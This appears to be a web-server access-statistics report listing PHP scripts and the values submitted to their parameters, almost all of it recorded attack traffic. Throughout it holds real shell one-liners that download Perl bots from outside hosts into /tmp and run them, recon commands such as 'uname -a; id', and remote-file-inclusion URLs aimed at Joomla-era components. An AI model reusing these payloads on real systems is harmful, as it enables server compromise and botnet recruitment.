| Script | Total Accesses |
|
/wusage/summary/cgi.html//skin/zero_vote/error.php
|
9,551
|
| Parameters by Submitted Value |
| Parameter |
/mosConfig_absolute_path
|
| Value | Accesses |
| http://tukangbecak.com/ban.gif? |
1 |
| Parameter |
|
| Value | Accesses |
|
2 |
| Parameter |
action
|
| Value | Accesses |
|
1 |
| Parameter |
cmd
|
| Value | Accesses |
| uname -a; id |
35 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
32 |
| id |
28 |
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http
://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson
.110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt;
perl bn.txt |
24 |
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt |
21 |
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt* |
21 |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
18 |
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt* |
15 |
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt |
13 |
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt? |
12 |
| Parameter |
dir
|
| Value | Accesses |
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www????????????????????????????? |
98 |
| http://www.jungo8949.co.kr/tool25.txt? |
97 |
| http://usuarios.arnet.com.ar/larry123/safe.txt? |
96 |
| http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? |
85 |
|
74 |
| http://www.gumgangfarm.com/shop/data/id.txt? |
59 |
| http://216.83.134.89/teste2bot.txt? |
52 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
49 |
| http://wsteam.net/bt/var.txt? |
48 |
| http://www.capsoir.com/images/TRA.txt? |
46 |
| Parameter |
dirhttp://206.71.148.89/pbot.txt??]
|
| Value | Accesses |
|
1 |
| Parameter |
dirhttp://brutus.altervista.org/php5/insert??
|
| Value | Accesses |
|
1 |
| Parameter |
dirhttp://www.aabbcc.kit.net/vai.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
dirhttp://www.ss3s.org/r57.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
error
|
| Value | Accesses |
| http://www.codeduc.cl/documentos/id.txt?? |
2 |
| OTHER: |
8,618 |
| Script | Total Accesses |
/wusage/summary/cgi.html/components/com_galleria/galleria.ht
ml.php
|
7,398
|
| Parameters by Submitted Value |
| Parameter |
|
| Value | Accesses |
| http://hackangel.xm.com/good.txt? |
1 |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
29 |
| uname -a; id |
25 |
cd /tmp;rm botnet.txt;wget http://nodan.110mb.com/botnet.txt
;fetch http://nodan.110mb.com/botnet.txt;lwp-download http:/
/nodan.110mb.com/botnet.txt;curl -O http://nodan.110mb.com/b
otnet.txt;lynx http://nodan.110mb.com/botnet.txt;perl botnet
.txt;rm botnet.txt |
24 |
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt |
22 |
cd /tmp;rm ng.txt;wget http://www.cer3ja.xpg.com.br/ng.txt;f
etch http://www.cer3ja.xpg.com.br/ng.txt;lwp-download http:/
/www.cer3ja.xpg.com.br/ng.txt;curl -O http://www.cer3ja.xpg.
com.br/ng.txt;lynx http://www.cer3ja.xpg.com.br/ng.txt;perl
ng.txt;rm -rf ng.txt |
16 |
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt? |
15 |
| id |
15 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
15 |
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http
://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson
.110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt;
perl bn.txt |
12 |
cd /tmp;rm -rf pacote*;wget http://br.geocities.com/ozaminha
/pacote.txt;lwp-download http://br.geocities.com/ozaminha/pa
cote.txt;fetch http://br.geocities.com/ozaminha/pacote.txt;c
url -o pacote.txt http://br.geocities.com/ozaminha/pacote.tx
t;GET http://br.geocities.com/ozaminha/pacote.txt >pacote.tx
t;lynx -source http://br.geocities.com/ozaminha/pacote.txt >
pacote.txt;perl pacote.txt;rm -rf pacote.txt* |
12 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
31 |
| Parameter |
mosConfig_absolute_
|
| Value | Accesses |
| http://www.lordxpl.xpg.com.br/own.txt???? |
8 |
| http://www.lordxpl.we.bs/own.txt???? |
6 |
| http://joaobenner.googlepages.com/script2.txt?? |
4 |
|
2 |
| http://www.lordxpl.xpg.com.br/xxxx.txt?? |
1 |
| http://www.lordxpl.xpg.com.br/own.txt?? |
1 |
| Parameter |
mosConfig_absolute_path
|
| Value | Accesses |
|
2 |
| http://ch3z.max-host.pl/z/z/k.txt? |
283 |
| http://ownsirc.googlepages.com/botnet.txt? |
98 |
| http://www.jungo8949.co.kr/tool25.txt? |
95 |
|
93 |
| http://www.oslutadores.com/?id=23530 |
70 |
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www????????????????????????????? |
67 |
| http://www.freewebs.com/yahwek/sete.txt? |
64 |
| http://www.? |
62 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
60 |
| Parameter |
mosConfig_absolute_pathhttp://kamloopstutor.com/images/Qe3?
|
| Value | Accesses |
|
1 |
| Parameter |
mosConfig_absolute_pathhttp://www.geocities.com/t0penghit4m/
DXKYTGF-09887/topeng.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
mosconfig_absolute_path
|
| Value | Accesses |
|
30 |
| http://agatsuma.bestfreewebspace.net/bn |
2 |
| Parameter |
output
|
| Value | Accesses |
notfounderror/components/com_galleria/galleria.html.php?mosC
onfig_absolute_path=http://www.vampireunix.net/cmds.txt? |
1 |
| Parameter |
xroot
|
| Value | Accesses |
| www.popcorn.de/cmd? |
1 |
| OTHER: |
6,229 |
| Script | Total Accesses |
/wusage/summary/cgi.html/components/com_rsgallery/rsgallery.
html.php
|
6,768
|
| Parameters by Submitted Value |
| Parameter |
|
| Value | Accesses |
|
2 |
| http://badmus.by.ru/id.txt? |
1 |
| Parameter |
cmd
|
| Value | Accesses |
| uname -a; id |
28 |
cd /tmp;GET http://www.army5.com.br/bot.txt > bot.txt;perl b
ot.txt;rm bot.txt |
24 |
| id |
24 |
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt |
20 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
18 |
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt |
15 |
cd /tmp;GET http://spr0x.kit.net/bot.txt > bot.txt;perl bot.
txt;rm bot.txt |
14 |
cd /tmp;wget http://www.freewebs.com/ferinha/ferinha.txt;cur
l -O -f http://www.freewebs.com/ferinha/ferinha.txt;lynx -so
urce http://www.freewebs.com/ferinha/ferinha.txt;lwp-rget ht
tp://www.freewebs.com/ferinha/ferinha.txt;fetch http://www.f
reewebs.com/ferinha/ferinha.txt;perl ferinha.txt;rm -rf feri
nha.txt |
14 |
cd /tmp;GET http://johncarter.50webs.com/bot.txt > bot.txt;p
erl bot.txt;rm bot.txt |
13 |
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt |
11 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
4 |
| Parameter |
mo/www.locations-cotedazur.com/index.php?lg
|
| Value | Accesses |
| http://www.freewebs.com/h1h1h1/p.txt?? |
5 |
| http://www.rj2009.kit.net/ddd.txt? |
4 |
| http://www.freewebs.com/t420/p.txt?? |
4 |
| http://www.rj2008.kit.net/p.txt?? |
3 |
| http://www.freewebs.com/playssonn/p.txt?? |
3 |
| http://www.rj2009.kit.net/p.txt? |
2 |
| http://www.rj2009.kit.net/p.txt?? |
1 |
| http://www.freewebs.com/quitando/p.txt?? |
1 |
| http://www.rj2009.kit.net/ddd.txt?? |
1 |
| http://www.rj2008.kit.net/perl.txt? |
1 |
| Parameter |
mosConfig_absolute_
|
| Value | Accesses |
| http://www.lordxpl.we.bs/own.txt???? |
4 |
| http://joaobenner.googlepages.com/script2.txt?? |
3 |
| http://www.lordxpl.xpg.com.br/own.txt???? |
2 |
| Parameter |
mosConfig_absolute_path
|
| Value | Accesses |
| http://qlzr.host.sk/line.gif? |
153 |
| http://dark4ngel.hostinggratisargentina.com/http? |
106 |
| http://usuarios.arnet.com.ar/larry123/safe.txt? |
105 |
| http://spr0x.kit.net/cmdpriv8/tool25.dat? |
92 |
| http://www.jungo8949.co.kr/tool25.txt? |
74 |
| http://ownsirc.googlepages.com/botnet.txt? |
57 |
|
50 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
48 |
| http://www.oslutadores.com/?id=23530 |
46 |
| http://www.autogas-dortmund.de/index.txt? |
45 |
| Parameter |
mosConfig_absolute_pathhttp://www.r57.li/c99.txt?
|
| Value | Accesses |
|
2 |
| Parameter |
mosconfig_absolute_path
|
| Value | Accesses |
|
30 |
| http://agatsuma.bestfreewebspace.net/bn |
2 |
| Parameter |
s
|
| Value | Accesses |
| r |
2 |
| Parameter |
xroot
|
| Value | Accesses |
| www.popcorn.de/cmd? |
1 |
| OTHER: |
5,733 |
| Script | Total Accesses |
/wusage/summary/cgi.html//components/com_facileforms/facilef
orms.frame.php
|
5,709
|
| Parameters by Submitted Value |
| Parameter |
|
| Value | Accesses |
|
1 |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch
http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11
0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx
http://garyz.110mb.com/bnt.txt;perl bnt.txt |
30 |
cd /tmp;GET http://johncarter.50webs.com/bot.txt > bot.txt;p
erl bot.txt;rm bot.txt |
24 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
22 |
cd /tmp;GET http://www.army5.com.br/bot.txt > bot.txt;perl b
ot.txt;rm bot.txt |
22 |
cd /tmp;GET http://johncarter.50webs.com/bruxOm4l.txt > brux
Om4l.txt;perl bruxOm4l.txt abcase |
20 |
cd /tmp;rm bn.txt;wget http://garyz.110mb.com/bn.txt;fetch h
ttp://garyz.110mb.com/bn.txt;lwp-download http://garyz.110mb
.com/bn.txt;curl -O http://garyz.110mb.com/bn.txt;lynx http:
//garyz.110mb.com/bn.txt;perl bn.txt |
17 |
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w
ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r
oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt.
kit.net/root.txt;perl root.txt |
16 |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
15 |
cd /tmp;GET http://spr0x.kit.net/bot.txt > bot.txt;perl bot.
txt;rm bot.txt |
14 |
cd /tmp;rm scan.txt;wget http://garyz.110mb.com/scan.txt;fet
ch http://garyz.110mb.com/scan.txt;lwp-download http://garyz
.110mb.com/scan.txt;curl -O http://garyz.110mb.com/scan.txt;
lynx http://garyz.110mb.com/scan.txt;perl scan.txt;rm -rf sc
an.txt |
14 |
| Parameter |
ff_colendar/samplecalendar.php/oneadmin/adminfoot.php?path[d
ocroot]
|
| Value | Accesses |
| http://www.rj2008.kit.net/p.txt?? |
6 |
| http://www.freewebs.com/h1h1h1/p.txt?? |
6 |
| http://www.rj2009.kit.net/ddd.txt? |
5 |
| http://www.freewebs.com/t420/p.txt?? |
5 |
| http://www.freewebs.com/playssonn/p.txt?? |
4 |
| http://www.freewebs.com/b0mb4do1337/p.txt?? |
4 |
| http://www.digownz.kit.net/pbot1.txt?? |
4 |
| http://www.rj2009.kit.net/p.txt? |
2 |
| http://flaw.we.bs/a.txt? |
2 |
| http://www.digownz.kit.net/dq1.txt? |
1 |
| Parameter |
ff_compath
|
| Value | Accesses |
| http://spr0x.kit.net/cmdpriv8/tool25.dat? |
121 |
| http://ownsirc.googlepages.com/botnet.txt? |
83 |
| http://www.lordxpl.xpg.com.br/own.txt? |
69 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
68 |
| http://www.lordxpl.xpg.com.br/own.txt?? |
66 |
| http://www.oslutadores.com/?id=23530 |
58 |
| http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? |
53 |
| http://www.freewebs.com/yahwek/sete.txt? |
51 |
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www????????????????????????????? |
50 |
|
49 |
| Parameter |
ff_compathhttp://www.gvnr.xpg.com.br/Hotmail.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
18 |
| Parameter |
mosConfig_absolute_path
|
| Value | Accesses |
| http://www.ritterspektakel-leipzig.de/administrator/can? |
1 |
| OTHER: |
4,787 |
| Script | Total Accesses |
|
/wusage/summary/cgi.html//include.php
|
5,014
|
| Parameters by Submitted Value |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
25 |
| uname -a; id |
11 |
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch
http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11
0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx
http://garyz.110mb.com/bnt.txt;perl bnt.txt |
10 |
| id |
10 |
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet
ch http://71.41.190.203/start.txt;lwp-download http://71.41.
190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn
x http://71.41.190.203/start.txt;perl start.txt;rm -rf start
.txt* |
8 |
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4
/srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;
lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu
rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http
://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf
srz.txt* |
8 |
cd /tmp;wget http://projectyenor2.iespana.es/file234.txt;cur
l -O http://projectyenor2.iespana.es/file234.txt;fetch http:
//projectyenor2.iespana.es/file234.txt;lynx http://projectye
nor2.iespana.es/file234.txt;lwp-download http://projectyenor
2.iespana.es/file234.txt;perl file234.txt?? |
6 |
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http
://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson
.110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt;
perl bn.txt |
6 |
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt |
6 |
cd /tmp;rm start.txt;wget http://189.24.38.250:8090/start.tx
t;fetch http://189.24.38.250:8090/start.txt;lwp-download htt
p://189.24.38.250:8090/start.txt;curl -O http://189.24.38.25
0:8090/start.txt;lynx http://189.24.38.250:8090/start.txt;pe
rl start.txt;rm start.txt |
5 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
28 |
| Parameter |
path[docroot]
|
| Value | Accesses |
| http://ownsirc.googlepages.com/botnet.txt? |
85 |
| http://www.rele.by/files/id.txt? |
66 |
| http://www.oslutadores.com/?id=23530 |
62 |
| http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? |
58 |
| http://www.freewebs.com/yahwek/sete.txt? |
56 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
55 |
| http://www.jolieloves.com/mori/cmd.txt? |
53 |
| http://189.23.251.131/~tiago/new.txt? |
52 |
|
44 |
| http://www.lordxpl.xpg.com.br/own.txt?? |
39 |
| OTHER: |
4,321 |
| Script | Total Accesses |
|
/wusage/summary/cgi.html//modules/xfsection/modify.php
|
4,696
|
| Parameters by Submitted Value |
| Parameter |
caminho
|
| Value | Accesses |
| marajoara |
1 |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
24 |
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt* |
22 |
| uname -a; id |
17 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
14 |
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p
erl botx2.txt;rm -rf *txt* |
13 |
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2.
txt;rm -rf *txt* |
10 |
cd /tmp;lwp-download http://h1.ripway.com/arroba5/botx.txt;p
erl botx.txt;rm -rf *botx* |
8 |
| id |
7 |
cd /tmp;wget http://h1.ripway.com/cmdtsk/botx2.txt;perl botx
2.txt;rm -rf *txt* |
7 |
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt;
fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee
p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t
xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf
*.txt |
7 |
| Parameter |
dir_module
|
| Value | Accesses |
| http://ownsirc.googlepages.com/botnet.txt? |
85 |
| http://www.oslutadores.com/?id=23530 |
62 |
| http://www.jolieloves.com/mori/cmd.txt? |
56 |
| http://www.freewebs.com/yahwek/sete.txt? |
52 |
| http://189.23.251.131/~tiago/new.txt? |
51 |
| http://h1.ripway.com/tsk4/cmd.txt? |
50 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
50 |
|
47 |
| http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt? |
36 |
| http://lol123.fileave.com/script9.txt?? |
34 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
26 |
| OTHER: |
4,017 |
| Script | Total Accesses |
|
//
|
4,019
|
| Parameters by Submitted Value |
| Parameter |
CONFIG_EXT[ADMIN_PATH]
|
| Value | Accesses |
| http://www.hagenclauss.de//vwar/convert/.r/bush?? |
1 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR]
|
| Value | Accesses |
| http://trimedia-online.net/ihmank/id.txt??? |
1 |
| Parameter |
GALLERY_BASEDIR
|
| Value | Accesses |
| http://www.syahrulazlan.com/login/id.txt??? |
2 |
| Parameter |
GLOBALS
|
| Value | Accesses |
|
58 |
| Parameter |
Itemid
|
| Value | Accesses |
|
20 |
| Parameter |
REX[INCLUDE_PATH]
|
| Value | Accesses |
http://pediatric-neurology-paris.net/media/install_41aca995b
9171/patch/includes/vsc/botid.txt? |
4 |
| Parameter |
STPHPLIB_DIR
|
| Value | Accesses |
| http://www.rostop.com/zerocool/id.txt??? |
1 |
| Parameter |
_AMGconfig[cfg_serverpath]
|
| Value | Accesses |
| http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? |
2 |
| Parameter |
_CONFIG[files][functions_page]
|
| Value | Accesses |
http://i328.co.jp/media/www.paypal.com/www.paypal.com/thumbs
/test.txt??? |
1 |
| Parameter |
_REQUEST
|
| Value | Accesses |
|
58 |
| OTHER: |
3,871 |
| Script | Total Accesses |
/wusage/summary/cgi.html/components/com_phpshop/toolbar.phps
hop.html.php
|
3,465
|
| Parameters by Submitted Value |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
21 |
| id |
14 |
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
|
13 |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
11 |
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch
http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11
0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx
http://garyz.110mb.com/bnt.txt;perl bnt.txt |
10 |
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt |
9 |
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt |
8 |
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt;
fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee
p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t
xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf
*.txt |
8 |
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc
raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/
pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap
s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p
emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t
xt;perl pemlk.txt;rm -rf pemlk*.txt |
7 |
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt? |
7 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
13 |
| Parameter |
mosConfig_absolute_path
|
| Value | Accesses |
| http://ownsirc.googlepages.com/botnet.txt? |
59 |
| http://www.jolieloves.com/mori/cmd.txt? |
47 |
| http://www.jungo8949.co.kr/tool25.txt? |
42 |
| http://www.oslutadores.com/?id=23530 |
36 |
| http://www.freewebs.com/yahwek/sete.txt? |
31 |
| http://www.neoncomanda.kit.net/tool25.dat? |
30 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
30 |
|
28 |
| http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? |
26 |
| http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? |
26 |
| OTHER: |
2,989 |
| Script | Total Accesses |
|
/wusage/summary/cgi.html/modules/AllMyGuests/signin.php
|
3,452
|
| Parameters by Submitted Value |
| Parameter |
_AMGconfig[cfg_serverpath]
|
| Value | Accesses |
| http://c4sh1234.100free.com/sc.gif? |
52 |
| http://ownsirc.googlepages.com/botnet.txt? |
47 |
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www????????????????????????????? |
39 |
| http://www.freewebs.com/yahwek/sete.txt? |
35 |
| http://www.jungo8949.co.kr/tool25.txt? |
34 |
| http://www.oslutadores.com/?id=23530 |
34 |
| http://h1.ripway.com/tsk4/cmd.txt? |
32 |
| http://www.bergenfest.no/vnc/cmd.txt? |
32 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
25 |
| http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? |
24 |
| Parameter |
_AMGconfig[cfg_serverpats/tinycontent/admin/spaw/spaw_contro
l.class.php?spaw_root
|
| Value | Accesses |
| http://www.digownz.kit.net/pbot1.txt?? |
9 |
| http://www.freewebs.com/t420/p.txt?? |
6 |
| http://www.rj2008.kit.net/p.txt?? |
6 |
| http://www.freewebs.com/h1h1h1/p.txt?? |
6 |
| http://www.rj2009.kit.net/ddd.txt? |
6 |
| http://www.freewebs.com/playssonn/p.txt?? |
5 |
| http://www.freewebs.com/b0mb4do1337/p.txt?? |
4 |
| http://www.digownz.kit.net/pbot1.txt? |
4 |
| http://flaw.we.bs/a.txt? |
3 |
| http://www.freewebs.com/playssonn/dq.txt? |
2 |
| Parameter |
_AMGconfigcfg_serverpath]
|
| Value | Accesses |
| http://h1.ripway.com/tsk4/cmd.txt? |
31 |
| http://h1.ripway.com/tsk7/cmd.txt? |
11 |
| http://h1.ripway.com/tsk4/botlogin.txt? |
6 |
http://www.019online.com/components/com_rwcards/images/cmd.t
xt? |
5 |
| http://h1.ripway.com/tsk4/TESTE.txt? |
4 |
| http://www.auzr.kz/tender/files/cmd.txt? |
3 |
| http://h1.ripway.com/tsk7/botINDO.txt? |
3 |
| http://www.auzr.kz/tender/files/cmd.jpg? |
3 |
| http://www.miskolctapolca.hu/hirdetesek/IND.jpg? |
3 |
| http://h1.ripway.com/tsk7/botIND.txt? |
2 |
| Parameter |
caminho
|
| Value | Accesses |
| marajoara |
1 |
| Parameter |
chdir
|
| Value | Accesses |
|
1 |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt* |
27 |
